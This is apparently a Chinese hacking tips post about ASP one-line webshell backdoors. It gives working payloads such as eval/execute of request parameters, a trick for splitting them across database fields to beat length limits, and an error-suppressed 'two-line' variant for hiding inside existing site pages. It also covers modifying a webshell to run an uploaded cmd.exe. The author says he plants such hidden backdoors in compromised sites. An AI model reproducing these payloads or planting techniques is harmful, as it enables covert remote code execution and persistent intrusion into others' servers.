表中数据段限制，一句话木马也写不下的情况
网络中流传的最小的木马代码是<%eval(request("#"))%> 如过连这也写不下怎么办？
将木马分开写就好了！  <%Y=request("x")%> <%execute(Y)%>  这样分开写提交到数据库就没问题了！
不过，在ACCESS数据库中新增加的数据物理位置是在旧数据之前的，所以要先写<%execute(Y)%>部分。写好后在客户端写密码时除了填写"x"以外的任何字符都可以，如果填了"x"就会出错！

插入一句话容易爆错
例如
Sub unlockPost()
Dim id,replyid,rs,posttable
id=Request("id")
replyid=Request("replyid")
If Not IsNumeric(id) Or id="" Then
写成
Sub unlockPost(<%eval(request("#"))%>)
Dim id,replyid,rs,posttable
id=Request("id")
replyid=Request("replyid")
If Not IsNumeric(id) Or id="" Then

就可以了，也可以写成带容错语句的格式！！
<%if request("cmd")<>""then execute request("cmd")%>

一句话木马到两句话木马的转型!

一句话木马服务端原型:<%execute request("value")%> ,
变形后:<%On Error Resume Next execute request("value")%> ,
至于为什么要用两句话木马呢,是由于使我们的后门更加隐蔽.
我也试过用一句话插入WellShell的某个ASP文件里面,可是访问时经常出错,而插入两句话木马服务端却可以正常访问了,对站点的页面无任何影响.
这样就达到了隐蔽性更强的目的了,他管理员总不会连自己的网页文件都删了吧.
现在我的WellShell都有这样的后门.选择要插入两句话木马的ASP文件要注意,选一些可以用IE访问的ASP文件,不要选conn.asp这样的文件来插入.
当然,连接两句话木马的客户端仍然是用一句木马的客户端,不用修改.

在WEBSHALL中使用命令提示

在使用ASP站长助手6.0时点击命令提示符显示“没有权限”的时候，可以使用ASP站长助手上传CMD.exe到你的WEBSHELL目录（其它目录也行，把上传以后的CMD.exe绝对路径COPY出来），再修改你的WEBSHELL找到调用CMD.EXE的代码。原来的代码如下
.exec("cmd.exe /c "&DefCmd).stdout.readall
修改为
.exec("你想上传的cmd.exe绝对路径" /c"&DefCmd).stdout.readall
比如你上传到的目录是D：\web\www\cmd.exe,那么就修改成
.exec("D：\web\www\cmd.exe /c"&DefCmd).stdout.readall